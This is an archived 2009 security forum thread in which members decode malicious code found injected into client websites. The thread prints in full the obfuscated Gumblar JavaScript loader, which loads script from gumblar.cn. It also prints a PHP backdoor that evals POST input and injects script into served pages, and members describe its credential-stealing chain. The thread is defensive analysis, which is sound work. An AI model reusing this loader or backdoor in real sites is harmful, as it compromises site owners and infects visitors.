Zero Identity - General - Security - decode me

Username: Password: [Forgot Password?] [Not Registered?]

Navigation

Navigation

Challenges

Media

Contribute

ZI Store Updates

Zi Store

Link to UsIf you'd like to become an affilate, please Link to Us!

Online Users

Registered Users: 1426

Latest Registration: gohan

Online Users: 10
(0 Members, 10 Guests)

Poll

If your shout contains ! in the begining, your links will not be clickable.
If you enter the user's full username, it will be highlighted just for that user.Shoutbox

rohansingh47rohansingh47

Last Login:
10 year(s) ago
Joined:
07/17/2008 05:41
Experience:
1005.63 (04 day(s) ago)

hi @vs4vijay what's up

3l_f3n1x3l_f3n1x

Last Login:
10 year(s) ago
Joined:
08/05/2008 22:56
Experience:
276.43 (05 day(s) ago)

what's up?

vs4vijayvs4vijay

Last Login:
10 year(s) ago
Joined:
10/02/2008 06:41
Experience:
1070.77 (07 day(s) ago)

hello buddies...

3l_f3n1x3l_f3n1x

Last Login:
10 year(s) ago
Joined:
08/05/2008 22:56
Experience:
276.43 (21 day(s) ago)

I often visit ZI to see if there's some activity, but I always find it pretty much dead

Last Login:
10 year(s) ago
Joined:
03/30/2008 18:30
Experience:
19699.95 (21 day(s) ago)

hey hows everyone doing. just checking in to see if people are still alive.

swiftnomadswiftnomad

Public Relations

Last Login:
10 year(s) ago
Joined:
04/04/2008 13:35
Experience:
3274.18 (23 day(s) ago)

@el3v3nty , what's up? @mrdotkom, what's up?

[Shoutbox Archive]

Zero Identity Forums - General - Security - decode me

Are you bored? Check out the unaswered threads!

swiftnomad Administrator Public Relations ZI Guru Joined: 04.04.2008 Last Seen: 10 year(s) ago Experience: 3274.18 Points: 405
	#1 decode me on May 13 2009 15:39
	Code Highlighting :: Select Code function(qLx){var nASYW='%';var jkX=('var.20.61.3d.22.53.63r.69ptEngine.22.2cb.3d.22Version.28.29+.22.2cj.3d.22.22.2cu.3d.6ea.76.69ga.74o.72.2eus.65rAge.6et.3bi.66((u.2eindexOf(.22Win.22).3e0).26.26(u.2e.69nd.65xO.66(.22NT.206.22).3c0.29.26.26(docu.6de.6et.2eco.6fkie.2e.69n.64e.78.4ff(.22miek.3d1.22).3c0).26.26.28typeo.66.28zrv.7a.74s).21.3dt.79p.65o.66(.22A.22)).29.7bzrv.7ats.3d.22A.22.3b.65val.28.22i.66(windo.77.2e.22+a+.22)j.3dj+.22+a+.22Ma.6a.6fr.22+b.2b.61+.22Minor.22+b.2b.61.2b.22.42uild.22+b+.22j.3b.22.29.3bd.6fcument.2ewrite(.22.3cscri.70.74.20src.3d.2f.2f.67umblar.2e.63.6e.2fr.73s.2f.3f.69d.3d.22+j+.22.3e.3c.5c.2f.73cript.3e.22.29.3b.7d').replace(qLx,nASYW);eval(unescape(jkX))})(/./g); Clients websites have a lot of encrypted code and hidden iframes and all of them are reported attack sites. Im trying to figure out what all this encrypted shit is. Code Highlighting :: Select Code <?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihxTHgpe3ZhciBuQVNZVz0nJSc7dmFyIGprWD0oJ3Zhci4yMC42MS4zZC4yMi41My42M3IuNjlwdEVuZ2luZS4yMi4yY2IuM2QuMjJWZXJzaW9uLjI4LjI5Ky4yMi4yY2ouM2QuMjIuMjIuMmN1LjNkLjZlYS43Ni42OWdhLjc0by43Mi4yZXVzLjY1ckFnZS42ZXQuM2JpLjY2KCh1LjJlaW5kZXhPZiguMjJXaW4uMjIpLjNlMCkuMjYuMjYodS4yZS42OW5kLjY1eE8uNjYoLjIyTlQuMjA2LjIyKS4zYzAuMjkuMjYuMjYoZG9jdS42ZGUuNmV0LjJlY28uNmZraWUuMmUuNjluLjY0ZS43OC40ZmYoLjIybWllay4zZDEuMjIpLjNjMCkuMjYuMjYuMjh0eXBlby42Ni4yOHpydi43YS43NHMpLjIxLjNkdC43OXAuNjVvLjY2KC4yMkEuMjIpKS4yOS43Ynpydi43YXRzLjNkLjIyQS4yMi4zYi42NXZhbC4yOC4yMmkuNjYod2luZG8uNzcuMmUuMjIrYSsuMjIpai4zZGorLjIyK2ErLjIyTWEuNmEuNmZyLjIyK2IuMmIuNjErLjIyTWlub3IuMjIrYi4yYi42MS4yYi4yMi40MnVpbGQuMjIrYisuMjJqLjNiLjIyLjI5LjNiZC42ZmN1bWVudC4yZXdyaXRlKC4yMi4zY3NjcmkuNzAuNzQuMjBzcmMuM2QuMmYuMmYuNjd1bWJsYXIuMmUuNjMuNmUuMmZyLjczcy4yZi4zZi42OWQuM2QuMjIraisuMjIuM2UuM2MuNWMuMmYuNzNjcmlwdC4zZS4yMi4yOS4zYi43ZCcpLnJlcGxhY2UocUx4LG5BU1lXKTtldmFsKHVuZXNjYXBlKGprWCkpfSkoLy4vZyk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("n",$v))>5){$e=preg_match('#['"][^s'".,;?![]:/<>()]{30,}#',$v)\|\|preg_match('#[([](sd+,){20,}#',$v);if((preg_match('#bevalb#',$v)&&($e\|\|strpos($v,'fromCharCode')))\|\|($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- ndocument.write(unescape(.+?n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(s*<body)#mi',TMP_XHGFJOKL.'1',$s1);elseif(($s1!=$s)\|\|stristr($s,'</body')\|\|stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?> I figured out some of it. the base64 was easy.. Code Highlighting :: Select Code <script language=javascript><!-- (function(qLx){var nASYW='%';var jkX=('var.20.61.3d.22.53.63r.69ptEngine.22.2cb.3d.22Version.28.29+.22.2cj.3d.22.22.2cu.3d.6ea.76.69ga.74o.72.2eus.65rAge.6et.3bi.66((u.2eindexOf(.22Win.22).3e0).26.26(u.2e.69nd.65xO.66(.22NT.206.22).3c0.29.26.26(docu.6de.6et.2eco.6fkie.2e.69n.64e.78.4ff(.22miek.3d1.22).3c0).26.26.28typeo.66.28zrv.7a.74s).21.3dt.79p.65o.66(.22A.22)).29.7bzrv.7ats.3d.22A.22.3b.65val.28.22i.66(windo.77.2e.22+a+.22)j.3dj+.22+a+.22Ma.6a.6fr.22+b.2b.61+.22Minor.22+b.2b.61.2b.22.42uild.22+b+.22j.3b.22.29.3bd.6fcument.2ewrite(.22.3cscri.70.74.20src.3d.2f.2f.67umblar.2e.63.6e.2fr.73s.2f.3f.69d.3d.22+j+.22.3e.3c.5c.2f.73cript.3e.22.29.3b.7d').replace(qLx,nASYW);eval(unescape(jkX))})(/./g); --></script> but i dont get it. Code Highlighting :: Select Code `if (sizeof (problems.txt) > CRITICAL){ exec("> /dev/null"); }` USER: Hello Tech Support? I can't print... ME: Try cursive then <hang up>

pyr0t3chnician Member Too Legit Professional Analyst Joined: 04.01.2009 Last Seen: 10 year(s) ago Experience: 455.88 Points: 545
	#2 Too Legit on May 14 2009 22:25
	The first javascript stuff says this. The funciton takes is variable qlX (which is a period),then it replaces the .'s with % signs in the huge string and creates the script in unescape. Hope that helps somewhat in your decoding. Code Highlighting :: Select Code `var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent; if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){ zrvzts="A"; eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;"); document.write("<script src=//gumblar.cn/rss/?id="+j+"></script>");}` unless I am reading this wrong, it makes j = "ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuild+"j;" I have no idea what the code does besides checking user agent stuff and your cookies for miek=1. EDIT: found this site, has lots of info on gumblar.cn: http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/ Sounds like this malicious little bugger moves you over to the gumblar.cn website, forces a PDF file download with an Adobe exploit, then searches for your FTP clients, grabs stored passwords, sends them home, then logs on to those ftp sites, and modifies your files.

tancurrom Administrator Nibble Advanced Analyst Joined: 03.04.2008 Last Seen: 10 year(s) ago Experience: 501.5 Points: 450
	#3 on May 15 2009 13:34
	Yeah you got that somewhat. The string jkX is already escaped and also has the % replaced by periods to obfuscate it more, it holds the script that runs. The code that is then evaluated only runs if you are using windows (not NT), the cookie miek isn't 1 and zrvzts isn't a string. The second eval evaluates to this. Code Highlighting :: Select Code `if(window.ScriptEngine) { j = ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion(); }` I think it's basically fetching the local version number of the hack so it can be passed to their servers so they return the right exploit code to run, maybe log it as well. Ultimately you end up executing this... (were 000 is the version number) Code Highlighting :: Select Code `<script>zrvzts="A";</script> <script src=//gumblar.cn/rss/?id=000></script>` Setting the cookie miek=1 will prevent the script running as a quick fix. @pyr0t3chnician That link made me chuckle. Facts 2.1 and 2.2 are consistent with most scripts I write, they're kind of invalid points. A Nibble = 1/2 a Byte

pyr0t3chnician Member Too Legit Professional Analyst Joined: 04.01.2009 Last Seen: 10 year(s) ago Experience: 455.88 Points: 545
	#4 on May 15 2009 21:45
	So here's a question. Its all over the net that this malicious script is hosted by gumblar.cn, so why don't they get shut down? My friend owns a hosting/reseller company, and when someone reports something as little as spam from one of his clients servers, he shuts it down until they fix the problem. If someone is intentionally doing this, he straight up deletes their account. Also on a side note, he was pretty pissed this past weekend. Someone hacked into one of his major servers through SSH and deleted 75 VPS accounts on the partitions, all in about 5 minutes. He had to tell those clients they lost their databases, their backups, and pretty much everything that was stored on their VPS, so they weren't too happy. I told him to quit pissing off hackers and accept their fraudulent credit cards when they try to purchase a dedicated server.

Who is watching forums

Users viewing this page:	Guests (1)
Users viewing the forum:	1

© 2009 ZeroIdentity.org | Atlanta SEO

Powered by phpFort © 2008
Page generated in 0.482 seconds. :: MySQL Queries: 12